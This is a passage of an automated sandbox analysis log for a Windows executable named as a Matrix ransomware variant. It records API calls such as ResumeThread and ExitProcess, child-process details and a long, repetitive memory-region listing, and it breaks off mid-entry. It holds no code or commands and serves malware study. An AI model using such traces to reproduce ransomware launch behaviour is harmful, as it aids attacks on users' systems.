[28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, 
[216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, 
[397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0086.590] ResumeThread (hThread=0x48) returned 0x1 [0086.590] CloseHandle (hObject=0x48) returned 1 [0086.590] CloseHandle (hObject=0x4c) returned 1 [0086.590] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0086.591] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0086.591] ExitProcess (uExitCode=0x0) Process: id = "2" image_name = "2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe" filename = "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe" page_root = "0x7ea16640" os_pid = "0xa88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = 
"0xa78" cmd_line = "\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 173 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 174 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 175 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 176 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 177 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 178 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 179 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 180 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 181 start_va = 0x7ffdf000 end_va = 0x7ffdffff 
entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 182 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 183 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 184 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 185 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 186 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 187 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 188 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 189 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 190 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 191 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = 
"kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 192 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 193 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 194 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 195 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 196 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 197 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 198 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 199 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 200 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 201 start_va = 0x520000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 202 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 203 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 204 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 205 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 206 start_va = 0x5f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 207 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 208 start_va = 0x1300000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 209 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 210 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 211 start_va = 0x1440000 end_va = 0x15bffff entry_point = 0x0 region_type = private name = 
"private_0x0000000001440000" filename = "" Region: id = 212 start_va = 0x15c0000 end_va = 0x188efff entry_point = 0x15c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 213 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 214 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 284 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 285 start_va = 0x1890000 end_va = 0x1c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001890000" filename = "" Region: id = 286 start_va = 0x1ca0000 end_va = 0x20affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 287 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 288 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 289 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 290 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 291 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 292 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 293 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 294 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 295 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 296 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 297 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 298 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 299 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 300 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 301 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 302 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 303 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 304 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 305 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 306 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 307 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 308 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 309 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 310 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 311 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 312 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 313 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 314 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 315 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 316 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 317 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 318 start_va = 0x1d0000 end_va = 0x1dffff entry_point 
= 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 319 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 320 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 321 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 322 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 323 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 324 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 325 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 326 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 327 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 328 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 329 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 330 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 331 start_va = 0x1d0000 end_va = 0x1dffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 332 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 333 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 334 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 335 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 336 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 337 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 338 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 339 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 340 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 370 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 371 start_va = 0x1890000 end_va = 0x1c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001890000" filename = "" Region: id = 372 start_va = 0x1ca0000 end_va = 0x20affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 373 start_va = 0x1e0000 end_va = 0x1f0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 374 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 375 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 376 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 377 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 378 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 379 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 380 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 381 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 382 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 383 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 384 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 385 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 386 start_va = 0x1d0000 end_va = 
0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 387 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 388 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 389 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 390 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 391 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 392 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 393 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 394 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 395 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 396 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 397 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 398 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = 